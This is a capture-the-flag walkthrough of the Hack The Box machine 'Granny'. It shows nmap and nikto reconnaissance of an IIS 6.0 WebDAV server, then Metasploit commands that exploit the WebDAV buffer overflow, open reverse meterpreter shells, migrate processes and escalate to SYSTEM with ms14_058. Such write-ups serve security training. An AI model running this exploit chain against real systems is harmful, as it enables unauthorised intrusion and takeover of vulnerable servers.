OS Windows
IP: 10.10.10.14/15
Nmap:-
root@kali:~/Desktop# nmap -sS -A 10.10.10.15
Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-22 18:56 EST
Nmap scan report for 10.10.10.15
Host is up (0.17s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unkown
| Server Date: Thu, 22 Feb 2018 23:53:57 GMT
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|XP|2008 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_xp::sp2
cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 - SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP
SP2 or Windows Server 2003 SP2 (91%), Microsoft Windows Server 2003 R2 SP2 (88%), Microsoft Windows Server 2003 SP1 or R2 (88%),
Microsoft Windows 2003 SP2 (86%), Microsoft Windows Server 2003 SP1 or SP2 (86%), Microsoft Windows XP SP2 (86%), Microsoft Windows
2003 R2 (86%), Microsoft Windows Server 2003 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 170.45 ms 10.10.14.1
2 170.49 ms 10.10.10.15
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.06 seconds
root@kali:~/Desktop#
Only port open is open and the web server is IIS httpd 6.0 and webdav is also available in which put method is allowed, and the webpage is also not available.
Nikto
root@kali:~/Desktop# nikto -h 10.10.10.15
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.15
+ Target Hostname: 10.10.10.15
+ Target Port: 80
+ Start Time: 2018-02-22 19:01:01 (GMT-5)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server.
+ Retrieved dasl header: DAV:sql
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (UNLOCK PROPPATCH COPY LOCK PROPFIND MKCOL SEARCH listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST
If you google about IIS 6.0 webdav you can find a BOF exploit, and there is a msf module also available for this similar exploit which we are going to use.
msf > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf exploit(iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf exploit(iis_webdav_scstoragepathfromurl) > set RHOST 10.10.10.15
RHOST => 10.10.10.15
msf exploit(iis_webdav_scstoragepathfromurl) > exploit
[*] Started reverse TCP handler on 10.10.*.*:4444
[*] Sending stage (957487 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.*.*:4444 -> 10.10.10.15:1031) at 2018-02-22 19:23:56 -0500
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > sysinfo
Computer : GRANNY
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 3
Meterpreter : x86/windows
meterpreter >
We got the session but our sehll has very low privilege not even a user privilege, So first we need to migrate to a process which have some decent privilege and then try to find an exploit using local exploit suggester to escalate our privilege to gain system or administrator level access.
Privilege Escalation
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
260 4 smss.exe
316 260 csrss.exe
340 260 winlogon.exe
388 340 services.exe
400 340 lsass.exe
568 388 svchost.exe
668 388 svchost.exe
704 1068 cidaemon.exe
728 388 svchost.exe
756 388 svchost.exe
792 388 svchost.exe
928 388 spoolsv.exe
952 388 msdtc.exe
1068 388 cisvc.exe
1112 388 svchost.exe
1160 388 inetinfo.exe
1208 388 svchost.exe
1440 388 svchost.exe
1572 388 svchost.exe
1668 388 alg.exe
1772 568 wmiprvse.exe
1932 568 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2092 1068 cidaemon.exe
2124 1068 cidaemon.exe
2204 340 logon.scr
3080 1440 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
3172 3080 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
meterpreter > migrate 1932
[*] Migrating from 3172 to 1932...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter >
And we successfully migrated to NETWORK SERVICE and now we can run the local exploit suggester.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester \r
msf post(local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(local_exploit_suggester) > exploit
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 37 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf post(local_exploit_suggester) >
In Suggestion we got couple of exploits which we can use, lets try with the ms14_058_track_popup_menu
msf post(local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > show options
Module options (exploit/windows/local/ms14_058_track_popup_menu):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set LHOST 10.10.*.*
LHOST => 10.10.*.*
msf exploit(ms14_058_track_popup_menu) > set LPORT 444
LPORT => 444
msf exploit(ms14_058_track_popup_menu) > exploit
[*] Started reverse TCP handler on 10.10.*.*:444
[*] Launching notepad to host the exploit...
[+] Process 912 launched.
[*] Reflectively injecting the exploit DLL into 912...
[*] Injecting exploit into 912...
[*] Exploit injected. Injecting payload into 912...
[*] Payload injected. Executing exploit...
[*] Sending stage (957487 bytes) to 10.10.10.15
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.10.*.*:444 -> 10.10.10.15:1031) at 2018-02-22 20:21:02 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1660 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
..
..
C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt
********************************
C:\Documents and Settings\Lakis\Desktop>
..
..
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
********************************
C:\Documents and Settings\Administrator\Desktop>
Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram
Comments